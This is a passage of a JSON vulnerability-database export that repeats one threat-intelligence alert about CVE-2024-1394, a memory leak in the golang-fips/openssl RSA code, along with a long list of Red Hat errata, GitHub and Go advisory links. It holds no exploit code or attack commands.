https://access.redhat.com/errata/RHSA-2024:1501\n5. https://access.redhat.com/errata/RHSA-2024:1502\n6. https://access.redhat.com/errata/RHSA-2024:1561\n7. https://access.redhat.com/errata/RHSA-2024:1563\n8. https://access.redhat.com/errata/RHSA-2024:1566\n9. https://access.redhat.com/errata/RHSA-2024:1567\n10. https://access.redhat.com/errata/RHSA-2024:1574\n11. https://access.redhat.com/errata/RHSA-2024:1640\n12. https://access.redhat.com/errata/RHSA-2024:1644\n13. https://access.redhat.com/errata/RHSA-2024:1646\n14. https://access.redhat.com/errata/RHSA-2024:1763\n15. https://access.redhat.com/errata/RHSA-2024:1897\n16. https://access.redhat.com/errata/RHSA-2024:2562\n17. https://access.redhat.com/errata/RHSA-2024:2568\n18. https://access.redhat.com/errata/RHSA-2024:2569\n19. https://access.redhat.com/errata/RHSA-2024:2729\n20. https://access.redhat.com/errata/RHSA-2024:2730\n21. https://access.redhat.com/errata/RHSA-2024:2767\n22. https://access.redhat.com/errata/RHSA-2024:3265\n23. https://access.redhat.com/errata/RHSA-2024:3352\n24. https://access.redhat.com/errata/RHSA-2024:4146\n25. https://access.redhat.com/errata/RHSA-2024:4371\n26. https://access.redhat.com/errata/RHSA-2024:4378\n27. https://access.redhat.com/errata/RHSA-2024:4379\n28. https://access.redhat.com/errata/RHSA-2024:4502\n29. https://access.redhat.com/errata/RHSA-2024:4581\n30. https://access.redhat.com/errata/RHSA-2024:4591\n31. https://access.redhat.com/errata/RHSA-2024:4672\n32. https://access.redhat.com/errata/RHSA-2024:4699\n33. https://access.redhat.com/errata/RHSA-2024:4761\n34. https://access.redhat.com/errata/RHSA-2024:4762\n35. https://access.redhat.com/errata/RHSA-2024:4960\n36. https://access.redhat.com/errata/RHSA-2024:5258\n37. https://access.redhat.com/errata/RHSA-2024:5634\n38. https://access.redhat.com/errata/RHSA-2024:7262\n39. https://access.redhat.com/security/cve/CVE-2024-1394\n40. https://bugzilla.redhat.com/show_bug.cgi?id=2262921\n41. https://github.com/golang-fips/openssl/commit/85d31d0d257ce842c8a1e63c4d230ae850348136\n42. https://github.com/golang-fips/openssl/security/advisories/GHSA-78hx-gp6g-7mj6\n43. https://github.com/microsoft/go-crypto-openssl/commit/104fe7f6912788d2ad44602f77a0a0a62f1f259f\n44. https://pkg.go.dev/vuln/GO-2024-2660\n45. https://vuln.go.dev/ID/GO-2024-2660.json", "creation_timestamp": "2025-01-13T09:11:16.000000Z"}, {"uuid": "8f881436-ebaf-4d84-89e9-d1e046b24704", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1561", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/1356", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-1394\n\ud83d\udd39 Description: A memory leak flaw was found in Golang in the RSA encrypting/decrypting code, which might lead to a resource exhaustion vulnerability using attacker-controlled inputs\u200b. The memory leak happens in github.com/golang-fips/openssl/openssl/rsa.go#L113. The objects leaked are pkey\u200b and ctx\u200b. That function uses named return parameters to free pkey\u200b and ctx\u200b if there is an error initializing the context or setting the different properties. All return statements related to error cases follow the \"return nil, nil, fail(...)\" pattern, meaning that pkey\u200b and ctx\u200b will be nil inside the deferred function that should free them.\n\ud83d\udccf Published: 2024-03-21T12:16:38.790Z\n\ud83d\udccf Modified: 2025-01-13T08:35:31.150Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1462\n2. https://access.redhat.com/errata/RHSA-2024:1468\n3. https://access.redhat.com/errata/RHSA-2024:1472\n4. https://access.redhat.com/errata/RHSA-2024:1501\n5. https://access.redhat.com/errata/RHSA-2024:1502\n6. https://access.redhat.com/errata/RHSA-2024:1561\n7. https://access.redhat.com/errata/RHSA-2024:1563\n8. https://access.redhat.com/errata/RHSA-2024:1566\n9. https://access.redhat.com/errata/RHSA-2024:1567\n10. https://access.redhat.com/errata/RHSA-2024:1574\n11. https://access.redhat.com/errata/RHSA-2024:1640\n12. https://access.redhat.com/errata/RHSA-2024:1644\n13. https://access.redhat.com/errata/RHSA-2024:1646\n14. https://access.redhat.com/errata/RHSA-2024:1763\n15. https://access.redhat.com/errata/RHSA-2024:1897\n16. https://access.redhat.com/errata/RHSA-2024:2562\n17. https://access.redhat.com/errata/RHSA-2024:2568\n18. https://access.redhat.com/errata/RHSA-2024:2569\n19. https://access.redhat.com/errata/RHSA-2024:2729\n20. https://access.redhat.com/errata/RHSA-2024:2730\n21. https://access.redhat.com/errata/RHSA-2024:2767\n22. https://access.redhat.com/errata/RHSA-2024:3265\n23. https://access.redhat.com/errata/RHSA-2024:3352\n24. https://access.redhat.com/errata/RHSA-2024:4146\n25. https://access.redhat.com/errata/RHSA-2024:4371\n26. https://access.redhat.com/errata/RHSA-2024:4378\n27. https://access.redhat.com/errata/RHSA-2024:4379\n28. https://access.redhat.com/errata/RHSA-2024:4502\n29. https://access.redhat.com/errata/RHSA-2024:4581\n30. https://access.redhat.com/errata/RHSA-2024:4591\n31. https://access.redhat.com/errata/RHSA-2024:4672\n32. https://access.redhat.com/errata/RHSA-2024:4699\n33. https://access.redhat.com/errata/RHSA-2024:4761\n34. https://access.redhat.com/errata/RHSA-2024:4762\n35. https://access.redhat.com/errata/RHSA-2024:4960\n36. https://access.redhat.com/errata/RHSA-2024:5258\n37. https://access.redhat.com/errata/RHSA-2024:5634\n38. https://access.redhat.com/errata/RHSA-2024:7262\n39. https://access.redhat.com/security/cve/CVE-2024-1394\n40. https://bugzilla.redhat.com/show_bug.cgi?id=2262921\n41. https://github.com/golang-fips/openssl/commit/85d31d0d257ce842c8a1e63c4d230ae850348136\n42. https://github.com/golang-fips/openssl/security/advisories/GHSA-78hx-gp6g-7mj6\n43. https://github.com/microsoft/go-crypto-openssl/commit/104fe7f6912788d2ad44602f77a0a0a62f1f259f\n44. https://pkg.go.dev/vuln/GO-2024-2660\n45. https://vuln.go.dev/ID/GO-2024-2660.json", "creation_timestamp": "2025-01-13T09:11:16.000000Z"}, {"uuid": "8e966935-bf1d-4f0e-9b5d-46320270bed3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:3352", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/1356", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-1394\n\ud83d\udd39 Description: A memory leak flaw was found in Golang in the RSA encrypting/decrypting code, which might lead to a resource exhaustion vulnerability using attacker-controlled inputs\u200b. The memory leak happens in github.com/golang-fips/openssl/openssl/rsa.go#L113. The objects leaked are pkey\u200b and ctx\u200b. That function uses named return parameters to free pkey\u200b and ctx\u200b if there is an error initializing the context or setting the different properties. All return statements related to error cases follow the \"return nil, nil, fail(...)\" pattern, meaning that pkey\u200b and ctx\u200b will be nil inside the deferred function that should free them.\n\ud83d\udccf Published: 2024-03-21T12:16:38.790Z\n\ud83d\udccf Modified: 2025-01-13T08:35:31.150Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1462\n2. https://access.redhat.com/errata/RHSA-2024:1468\n3. https://access.redhat.com/errata/RHSA-2024:1472\n4. https://access.redhat.com/errata/RHSA-2024:1501\n5. https://access.redhat.com/errata/RHSA-2024:1502\n6. https://access.redhat.com/errata/RHSA-2024:1561\n7. https://access.redhat.com/errata/RHSA-2024:1563\n8. https://access.redhat.com/errata/RHSA-2024:1566\n9. https://access.redhat.com/errata/RHSA-2024:1567\n10. https://access.redhat.com/errata/RHSA-2024:1574\n11. https://access.redhat.com/errata/RHSA-2024:1640\n12. https://access.redhat.com/errata/RHSA-2024:1644\n13. https://access.redhat.com/errata/RHSA-2024:1646\n14. https://access.redhat.com/errata/RHSA-2024:1763\n15. https://access.redhat.com/errata/RHSA-2024:1897\n16. https://access.redhat.com/errata/RHSA-2024:2562\n17. https://access.redhat.com/errata/RHSA-2024:2568\n18. https://access.redhat.com/errata/RHSA-2024:2569\n19. https://access.redhat.com/errata/RHSA-2024:2729\n20. https://access.redhat.com/errata/RHSA-2024:2730\n21. https://access.redhat.com/errata/RHSA-2024:2767\n22. https://access.redhat.com/errata/RHSA-2024:3265\n23. https://access.redhat.com/errata/RHSA-2024:3352\n24. https://access.redhat.com/errata/RHSA-2024:4146\n25. https://access.redhat.com/errata/RHSA-2024:4371\n26. https://access.redhat.com/errata/RHSA-2024:4378\n27. https://access.redhat.com/errata/RHSA-2024:4379\n28. https://access.redhat.com/errata/RHSA-2024:4502\n29. https://access.redhat.com/errata/RHSA-2024:4581\n30. https://access.redhat.com/errata/RHSA-2024:4591\n31. https://access.redhat.com/errata/RHSA-2024:4672\n32. https://access.redhat.com/errata/RHSA-2024:4699\n33. https://access.redhat.com/errata/RHSA-2024:4761\n34. https://access.redhat.com/errata/RHSA-2024:4762\n35. https://access.redhat.com/errata/RHSA-2024:4960\n36. https://access.redhat.com/errata/RHSA-2024:5258\n37. https://access.redhat.com/errata/RHSA-2024:5634\n38. https://access.redhat.com/errata/RHSA-2024:7262\n39. https://access.redhat.com/security/cve/CVE-2024-1394\n40. https://bugzilla.redhat.com/show_bug.cgi?id=2262921\n41. https://github.com/golang-fips/openssl/commit/85d31d0d257ce842c8a1e63c4d230ae850348136\n42. https://github.com/golang-fips/openssl/security/advisories/GHSA-78hx-gp6g-7mj6\n43. https://github.com/microsoft/go-crypto-openssl/commit/104fe7f6912788d2ad44602f77a0a0a62f1f259f\n44. https://pkg.go.dev/vuln/GO-2024-2660\n45. https://vuln.go.dev/ID/GO-2024-2660.json", "creation_timestamp": "2025-01-13T09:11:16.000000Z"}, {"uuid": "48824cf0-f8fd-41fb-b597-df1333537701", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:4378", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/1356", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-1394\n\ud83d\udd39 Description: A memory leak flaw was found in Golang in the RSA encrypting/decrypting code, which might lead to a resource exhaustion vulnerability using attacker-controlled inputs\u200b. The memory leak happens in github.com/golang-fips/openssl/openssl/rsa.go#L113. The objects leaked are pkey\u200b and ctx\u200b. That function uses named return parameters to free pkey\u200b and ctx\u200b if there is an error initializing the context or setting the different properties. All return statements related to error cases follow the \"return nil, nil, fail(...)\" pattern, meaning that pkey\u200b and ctx\u200b will be nil inside the deferred function that should free them.\n\ud83d\udccf Published: 2024-03-21T12:16:38.790Z\n\ud83d\udccf Modified: 2025-01-13T08:35:31.150Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1462\n2. https://access.redhat.com/errata/RHSA-2024:1468\n3. https://access.redhat.com/errata/RHSA-2024:1472\n4. https://access.redhat.com/errata/RHSA-2024:1501\n5. https://access.redhat.com/errata/RHSA-2024:1502\n6. https://access.redhat.com/errata/RHSA-2024:1561\n7. https://access.redhat.com/errata/RHSA-2024:1563\n8. https://access.redhat.com/errata/RHSA-2024:1566\n9. https://access.redhat.com/errata/RHSA-2024:1567\n10. https://access.redhat.com/errata/RHSA-2024:1574\n11. https://access.redhat.com/errata/RHSA-2024:1640\n12. https://access.redhat.com/errata/RHSA-2024:1644\n13. https://access.redhat.com/errata/RHSA-2024:1646\n14. https://access.redhat.com/errata/RHSA-2024:1763\n15. https://access.redhat.com/errata/RHSA-2024:1897\n16. https://access.redhat.com/errata/RHSA-2024:2562\n17. https://access.redhat.com/errata/RHSA-2024:2568\n18. https://access.redhat.com/errata/RHSA-2024:2569\n19. https://access.redhat.com/errata/RHSA-2024:2729\n20. https://access.redhat.com/errata/RHSA-2024:2730\n21. https://access.redhat.com/errata/RHSA-2024:2767\n22. https://access.redhat.com/errata/RHSA-2024:3265\n23. https://access.redhat.com/errata/RHSA-2024:3352\n24. https://access.redhat.com/errata/RHSA-2024:4146\n25. https://access.redhat.com/errata/RHSA-2024:4371\n26. https://access.redhat.com/errata/RHSA-2024:4378\n27. https://access.redhat.com/errata/RHSA-2024:4379\n28. https://access.redhat.com/errata/RHSA-2024:4502\n29. https://access.redhat.com/errata/RHSA-2024:4581\n30. https://access.redhat.com/errata/RHSA-2024:4591\n31. https://access.redhat.com/errata/RHSA-2024:4672\n32. https://access.redhat.com/errata/RHSA-2024:4699\n33. https://access.redhat.com/errata/RHSA-2024:4761\n34. https://access.redhat.com/errata/RHSA-2024:4762\n35. https://access.redhat.com/errata/RHSA-2024:4960\n36. https://access.redhat.com/errata/RHSA-2024:5258\n37. https://access.redhat.com/errata/RHSA-2024:5634\n38. https://access.redhat.com/errata/RHSA-2024:7262\n39. https://access.redhat.com/security/cve/CVE-2024-1394\n40. https://bugzilla.redhat.com/show_bug.cgi?id=2262921\n41. https://github.com/golang-fips/openssl/commit/85d31d0d257ce842c8a1e63c4d230ae850348136\n42. https://github.com/golang-fips/openssl/security/advisories/GHSA-78hx-gp6g-7mj6\n43. https://github.com/microsoft/go-crypto-openssl/commit/104fe7f6912788d2ad44602f77a0a0a62f1f259f\n44. https://pkg.go.dev/vuln/GO-2024-2660\n45. https://vuln.go.dev/ID/GO-2024-2660.json", "creation_timestamp": "2025-01-13T09:11:16.000000Z"}, {"uuid": "2d7e5e22-134d-47e4-8e15-38619684615e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1640", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/1356", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-1394\n\ud83d\udd39 Description: A memory leak flaw was found in Golang in the RSA encrypting/decrypting code, which might lead to a resource exhaustion vulnerability using attacker-controlled inputs\u200b. The memory leak happens in github.com/golang-fips/openssl/openssl/rsa.go#L113. The objects leaked are pkey\u200b and ctx\u200b. That function uses named return parameters to free pkey\u200b and ctx\u200b if there is an error initializing the context or setting the different properties. All return statements related to error cases follow the \"return nil, nil, fail(...)\" pattern, meaning that pkey\u200b and ctx\u200b will be nil inside the deferred function that should free them.\n\ud83d\udccf Published: 2024-03-21T12:16:38.790Z\n\ud83d\udccf Modified: 2025-01-13T08:35:31.150Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1462\n2. https://access.redhat.com/errata/RHSA-2024:1468\n3. https://access.redhat.com/errata/RHSA-2024:1472\n4. https://access.redhat.com/errata/RHSA-2024:1501\n5. https://access.redhat.com/errata/RHSA-2024:1502\n6. https://access.redhat.com/errata/RHSA-2024:1561\n7. https://access.redhat.com/errata/RHSA-2024:1563\n8. https://access.redhat.com/errata/RHSA-2024:1566\n9. https://access.redhat.com/errata/RHSA-2024:1567\n10. https://access.redhat.com/errata/RHSA-2024:1574\n11. https://access.redhat.com/errata/RHSA-2024:1640\n12. https://access.redhat.com/errata/RHSA-2024:1644\n13. https://access.redhat.com/errata/RHSA-2024:1646\n14. https://access.redhat.com/errata/RHSA-2024:1763\n15. https://access.redhat.com/errata/RHSA-2024:1897\n16. https://access.redhat.com/errata/RHSA-2024:2562\n17. https://access.redhat.com/errata/RHSA-2024:2568\n18. https://access.redhat.com/errata/RHSA-2024:2569\n19. https://access.redhat.com/errata/RHSA-2024:2729\n20. https://access.redhat.com/errata/RHSA-2024:2730\n21. https://access.redhat.com/errata/RHSA-2024:2767\n22. https://access.redhat.com/errata/RHSA-2024:3265\n23. https://access.redhat.com/errata/RHSA-2024:3352\n24. https://access.redhat.com/errata/RHSA-2024:4146\n25. https://access.redhat.com/errata/RHSA-2024:4371\n26. https://access.redhat.com/errata/RHSA-2024:4378\n27. https://access.redhat.com/errata/RHSA-2024:4379\n28. https://access.redhat.com/errata/RHSA-2024:4502\n29. https://access.redhat.com/errata/RHSA-2024:4581\n30. https://access.redhat.com/errata/RHSA-2024:4591\n31. https://access.redhat.com/errata/RHSA-2024:4672\n32. https://access.redhat.com/errata/RHSA-2024:4699\n33. https://access.redhat.com/errata/RHSA-2024:4761\n34. https://access.redhat.com/errata/RHSA-2024:4762\n35. https://access.redhat.com/errata/RHSA-2024:4960\n36. https://access.redhat.com/errata/RHSA-2024:5258\n37. https://access.redhat.com/errata/RHSA-2024:5634\n38. https://access.redhat.com/errata/RHSA-2024:7262\n39. https://access.redhat.com/security/cve/CVE-2024-1394\n40. https://bugzilla.redhat.com/show_bug.cgi?id=2262921\n41. https://github.com/golang-fips/openssl/commit/85d31d0d257ce842c8a1e63c4d230ae850348136\n42. https://github.com/golang-fips/openssl/security/advisories/GHSA-78hx-gp6g-7mj6\n43. https://github.com/microsoft/go-crypto-openssl/commit/104fe7f6912788d2ad44602f77a0a0a62f1f259f\n44. https://pkg.go.dev/vuln/GO-2024-2660\n45. https://vuln.go.dev/ID/GO-2024-2660.json", "creation_timestamp": "2025-01-13T09:11:16.000000Z"}, {"uuid": "73292b14-166e-47bc-8370-108947fcf1c5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:4581", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/1356", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-1394\n\ud83d\udd39 Description: A memory leak flaw was found in Golang in the RSA encrypting/decrypting code, which might lead to a resource exhaustion vulnerability using attacker-controlled inputs\u200b. The memory leak happens in github.com/golang-fips/openssl/openssl/rsa.go#L113. The objects leaked are pkey\u200b and ctx\u200b. That function uses named return parameters to free pkey\u200b and ctx\u200b if there is an error initializing the context or setting the different properties. All return statements related to error cases follow the \"return nil, nil, fail(...)\" pattern, meaning that pkey\u200b and ctx\u200b will be nil inside the deferred function that should free them.\n\ud83d\udccf Published: 2024-03-21T12:16:38.790Z\n\ud83d\udccf Modified: 2025-01-13T08:35:31.150Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1462\n2. https://access.redhat.com/errata/RHSA-2024:1468\n3. https://access.redhat.com/errata/RHSA-2024:1472\n4. https://access.redhat.com/errata/RHSA-2024:1501\n5. https://access.redhat.com/errata/RHSA-2024:1502\n6. https://access.redhat.com/errata/RHSA-2024:1561\n7. https://access.redhat.com/errata/RHSA-2024:1563\n8. https://access.redhat.com/errata/RHSA-2024:1566\n9. https://access.redhat.com/errata/RHSA-2024:1567\n10. https://access.redhat.com/errata/RHSA-2024:1574\n11. https://access.redhat.com/errata/RHSA-2024:1640\n12. https://access.redhat.com/errata/RHSA-2024:1644\n13. https://access.redhat.com/errata/RHSA-2024:1646\n14. https://access.redhat.com/errata/RHSA-2024:1763\n15. https://access.redhat.com/errata/RHSA-2024:1897\n16. https://access.redhat.com/errata/RHSA-2024:2562\n17. https://access.redhat.com/errata/RHSA-2024:2568\n18. https://access.redhat.com/errata/RHSA-2024:2569\n19. https://access.redhat.com/errata/RHSA-2024:2729\n20. https://access.redhat.com/errata/RHSA-2024:2730\n21. https://access.redhat.com/errata/RHSA-2024:2767\n22. https://access.redhat.com/errata/RHSA-2024:3265\n23. https://access.redhat.com/errata/RHSA-2024:3352\n24. https://access.redhat.com/errata/RHSA-2024:4146\n25. https://access.redhat.com/errata/RHSA-2024:4371\n26. https://access.redhat.com/errata/RHSA-2024:4378\n27. https://access.redhat.com/errata/RHSA-2024:4379\n28. https://access.redhat.com/errata/RHSA-2024:4502\n29. https://access.redhat.com/errata/RHSA-2024:4581\n30. https://access.redhat.com/errata/RHSA-2024:4591\n31. https://access.redhat.com/errata/RHSA-2024:4672\n32. https://access.redhat.com/errata/RHSA-2024:4699\n33. https://access.redhat.com/errata/RHSA-2024:4761\n34. https://access.redhat.com/errata/RHSA-2024:4762\n35. https://access.redhat.com/errata/RHSA-2024:4960\n36. https://access.redhat.com/errata/RHSA-2024:5258\n37. https://access.redhat.com/errata/RHSA-2024:5634\n38. https://access.redhat.com/errata/RHSA-2024:7262\n39. https://access.redhat.com/security/cve/CVE-2024-1394\n40. https://bugzilla.redhat.com/show_bug.cgi?id=2262921\n41. https://github.com/golang-fips/openssl/commit/85d31d0d257ce842c8a1e63c4d230ae850348136\n42. https://github.com/golang-fips/openssl/security/advisories/GHSA-78hx-gp6g-7mj6\n43. https://github.com/microsoft/go-crypto-openssl/commit/104fe7f6912788d2ad44602f77a0a0a62f1f259f\n44. https://pkg.go.dev/vuln/GO-2024-2660\n45. https://vuln.go.dev/ID/GO-2024-2660.json", "creation_timestamp": "2025-01-13T09:11:16.000000Z"}, {"uuid": "363b9070-4e74-4e8a-a358-5913ff144160", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1574", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/1356", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-1394\n\ud83d\udd39 Description: A memory leak flaw was found in Golang in the RSA encrypting/decrypting code, which might lead to a resource exhaustion vulnerability using attacker-controlled inputs\u200b. The memory leak happens in github.com/golang-fips/openssl/openssl/rsa.go#L113. The objects leaked are pkey\u200b and ctx\u200b. That function uses named return parameters to free pkey\u200b and ctx\u200b if there is an error initializing the context or setting the different properties. All return statements related to error cases follow the \"return nil, nil, fail(...)\" pattern, meaning that pkey\u200b and ctx\u200b will be nil inside the deferred function that should free them.\n\ud83d\udccf Published: 2024-03-21T12:16:38.790Z\n\ud83d\udccf Modified: 2025-01-13T08:35:31.150Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1462\n2. https://access.redhat.com/errata/RHSA-2024:1468\n3. https://access.redhat.com/errata/RHSA-2024:1472\n4. https://access.redhat.com/errata/RHSA-2024:1501\n5. https://access.redhat.com/errata/RHSA-2024:1502\n6. https://access.redhat.com/errata/RHSA-2024:1561\n7. https://access.redhat.com/errata/RHSA-2024:1563\n8. https://access.redhat.com/errata/RHSA-2024:1566\n9. https://access.redhat.com/errata/RHSA-2024:1567\n10. https://access.redhat.com/errata/RHSA-2024:1574\n11. https://access.redhat.com/errata/RHSA-2024:1640\n12. https://access.redhat.com/errata/RHSA-2024:1644\n13. https://access.redhat.com/errata/RHSA-2024:1646\n14. https://access.redhat.com/errata/RHSA-2024:1763\n15. https://access.redhat.com/errata/RHSA-2024:1897\n16. https://access.redhat.com/errata/RHSA-2024:2562\n17. https://access.redhat.com/errata/RHSA-2024:2568\n18. https://access.redhat.com/errata/RHSA-2024:2569\n19. https://access.redhat.com/errata/RHSA-2024:2729\n20. https://access.redhat.com/errata/RHSA-2024:2730\n21. https://access.redhat.com/errata/RHSA-2024:2767\n22. https://access.redhat.com/errata/RHSA-2024:3265\n23. https://access.redhat.com/errata/RHSA-2024:3352\n24. https://access.redhat.com/errata/RHSA-2024:4146\n25. https://access.redhat.com/errata/RHSA-2024:4371\n26. https://access.redhat.com/errata/RHSA-2024:4378\n27. https://access.redhat.com/errata/RHSA-2024:4379\n28. https://access.redhat.com/errata/RHSA-2024:4502\n29. https://access.redhat.com/errata/RHSA-2024:4581\n30. https://access.redhat.com/errata/RHSA-2024:4591\n31. https://access.redhat.com/errata/RHSA-2024:4672\n32. https://access.redhat.com/errata/RHSA-2024:4699\n33. https://access.redhat.com/errata/RHSA-2024:4761\n34. https://access.redhat.com/errata/RHSA-2024:4762\n35. https://access.redhat.com/errata/RHSA-2024:4960\n36. https://access.redhat.com/errata/RHSA-2024:5258\n37. https://access.redhat.com/errata/RHSA-2024:5634\n38. https://access.redhat.com/errata/RHSA-2024:7262\n39. https://access.redhat.com/security/cve/CVE-2024-1394\n40. https://bugzilla.redhat.com/show_bug.cgi?id=2262921\n41. https://github.com/golang-fips/openssl/commit/85d31d0d257ce842c8a1e63c4d230ae850348136\n42. https://github.com/golang-fips/openssl/security/advisories/GHSA-78hx-gp6g-7mj6\n43. https://github.com/microsoft/go-crypto-openssl/commit/104fe7f6912788d2ad44602f77a0a0a62f1f259f\n44. https://pkg.go.dev/vuln/GO-2024-2660\n45. https://vuln.go.dev/ID/GO-2024-2660.json", "creation_timestamp": "2025-01-13T09:11:16.000000Z"}, {"uuid": "afd8b925-6d81-43d4-984d-ba5122de2331", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:4761", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/1356", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-1394\n\ud83d\udd39 Description: A memory leak flaw was found in Golang in the RSA encrypting/decrypting code, which might lead to a resource exhaustion vulnerability using attacker-controlled inputs\u200b. The memory leak happens in github.com/golang-fips/openssl/openssl/rsa.go#L113. The objects leaked are pkey\u200b and ctx\u200b. That function uses named return parameters to free pkey\u200b and ctx\u200b if there is an error initializing the context or setting the different properties. All return statements related to error cases follow the \"return nil, nil, fail(...)\" pattern, meaning that pkey\u200b and ctx\u200b will be nil inside the deferred function that should free them.\n\ud83d\udccf Published: 2024-03-21T12:16:38.790Z\n\ud83d\udccf Modified: 2025-01-13T08:35:31.150Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1462\n2. https://access.redhat.com/errata/RHSA-2024:1468\n3. https://access.redhat.com/errata/RHSA-2024:1472\n4. https://access.redhat.com/errata/RHSA-2024:1501\n5. https://access.redhat.com/errata/RHSA-2024:1502\n6. https://access.redhat.com/errata/RHSA-2024:1561\n7. https://access.redhat.com/errata/RHSA-2024:1563\n8. https://access.redhat.com/errata/RHSA-2024:1566\n9. https://access.redhat.com/errata/RHSA-2024:1567\n10. https://access.redhat.com/errata/RHSA-2024:1574\n11. https://access.redhat.com/errata/RHSA-2024:1640\n12. https://access.redhat.com/errata/RHSA-2024:1644\n13. https://access.redhat.com/errata/RHSA-2024:1646\n14. https://access.redhat.com/errata/RHSA-2024:1763\n15. https://access.redhat.com/errata/RHSA-2024:1897\n16. https://access.redhat.com/errata/RHSA-2024:2562\n17. https://access.redhat.com/errata/RHSA-2024:2568\n18. https://access.redhat.com/errata/RHSA-2024:2569\n19. https://access.redhat.com/errata/RHSA-2024:2729\n20. https://access.redhat.com/errata/RHSA-2024:2730\n21. https://access.redhat.com/errata/RHSA-2024:2767\n22. https://access.redhat.com/errata/RHSA-2024:3265\n23. https://access.redhat.com/errata/RHSA-2024:3352\n24. https://access.redhat.com/errata/RHSA-2024:4146\n25. https://access.redhat.com/errata/RHSA-2024:4371\n26. https://access.redhat.com/errata/RHSA-2024:4378\n27. https://access.redhat.com/errata/RHSA-2024:4379\n28. https://access.redhat.com/errata/RHSA-2024:4502\n29. https://access.redhat.com/errata/RHSA-2024:4581\n30. https://access.redhat.com/errata/RHSA-2024:4591\n31. https://access.redhat.com/errata/RHSA-2024:4672\n32. https://access.redhat.com/errata/RHSA-2024:4699\n33. https://access.redhat.com/errata/RHSA-2024:4761\n34. https://access.redhat.com/errata/RHSA-2024:4762\n35. https://access.redhat.com/errata/RHSA-2024:4960\n36. https://access.redhat.com/errata/RHSA-2024:5258\n37. https://access.redhat.com/errata/RHSA-2024:5634\n38. https://access.redhat.com/errata/RHSA-2024:7262\n39. https://access.redhat.com/security/cve/CVE-2024-1394\n40. https://bugzilla.redhat.com/show_bug.cgi?id=2262921\n41. https://github.com/golang-fips/openssl/commit/85d31d0d257ce842c8a1e63c4d230ae850348136\n42. https://github.com/golang-fips/openssl/security/advisories/GHSA-78hx-gp6g-7mj6\n43. https://github.com/microsoft/go-crypto-openssl/commit/104fe7f6912788d2ad44602f77a0a0a62f1f259f\n44. https://pkg.go.dev/vuln/GO-2024-2660\n45. https://vuln.go.dev/ID/GO-2024-2660.json", "creation_timestamp": "2025-01-13T09:11:16.000000Z"}, {"uuid": "2dd10130-e878-4c4b-8131-4984f5175f4c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:3265", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/1356", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-1394\n\ud83d\udd39 Description: A memory leak flaw was found in Golang in the RSA encrypting/decrypting code, which might lead to a resource exhaustion vulnerability using attacker-controlled inputs\u200b. The memory leak happens in github.com/golang-fips/openssl/openssl/rsa.go#L113. The objects leaked are pkey\u200b and ctx\u200b. That function uses named return parameters to free pkey\u200b and ctx\u200b if there is an error initializing the context or setting the different properties. All return statements related to error cases follow the \"return nil, nil, fail(...)\" pattern, meaning that pkey\u200b and ctx\u200b will be nil inside the deferred function that should free them.\n\ud83d\udccf Published: 2024-03-21T12:16:38.790Z\n\ud83d\udccf Modified: 2025-01-13T08:35:31.150Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1462\n2. https://access.redhat.com/errata/RHSA-2024:1468\n3. https://access.redhat.com/errata/RHSA-2024:1472\n4. 